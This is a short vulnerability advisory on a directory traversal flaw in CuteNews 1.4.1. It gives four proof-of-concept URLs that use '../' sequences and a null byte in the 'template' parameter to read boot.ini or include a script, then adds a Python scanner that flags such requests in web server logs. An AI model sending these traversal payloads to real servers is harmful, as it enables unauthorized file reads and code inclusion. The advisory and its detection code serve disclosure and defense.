CutePHP CuteNews Directory Traversal Vulnerability

An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/cute141/show_archives.php?template=../../../../../../../../boot.ini%00
http://www.example.com/cute141/show_archives.php?template=../../../../../../../../[script]
http://www.example.com/cute141/show_news.php?template=../../../../../../../../boot.ini%00
http://www.example.com/cute141/show_news.php?template=../../../../../../../../[script]
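
For defenders reviewing web server logs, the following added example (not part of the original advisory or of CuteNews) flags requests to the two scripts above whose `template` parameter decodes to a dot-dot path segment, a null byte, or an absolute path. It assumes combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Scripts and parameter taken from the proof-of-concept URLs on this page.
SCRIPTS = ("show_archives.php", "show_news.php")
PARAM = "template"
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines, not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /cute141/show_news.php?template=Headlines HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /cute141/show_archives.php?template=../../../../boot.ini%00 HTTP/1.1" 200 211',
    '192.0.2.11 - - [01/Jan/2010:10:00:09 +0000] "GET /cute141/show_news.php?template=%252e%252e%252fboot.ini HTTP/1.1" 200 211',
    '192.0.2.12 - - [01/Jan/2010:10:00:12 +0000] "GET /other/index.php?template=../x HTTP/1.1" 404 0',
]

def fully_decode(value, rounds=3):
    """Percent-decode several times so double-encoded input is also seen."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def template_findings(value):
    """Return the reasons a template value looks like a traversal attempt."""
    value = fully_decode(value)
    reasons = []
    if ".." in re.split(r"[\\/]", value):
        reasons.append("dot-dot segment")
    if "\x00" in value:
        reasons.append("null byte")
    if re.match(r"^(?:[\\/]|[A-Za-z]:)", value):
        reasons.append("absolute path")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for suspicious hits on the listed scripts."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        url = urlsplit(m.group(1)) if m else None
        if url is None or not url.path.endswith(SCRIPTS):
            continue
        for key, val in parse_qsl(url.query, keep_blank_values=True):
            reasons = template_findings(val) if key == PARAM else []
            if reasons:
                hits.append((n, reasons))
    return hits

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```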


 

Copyright 2010, SecurityFocus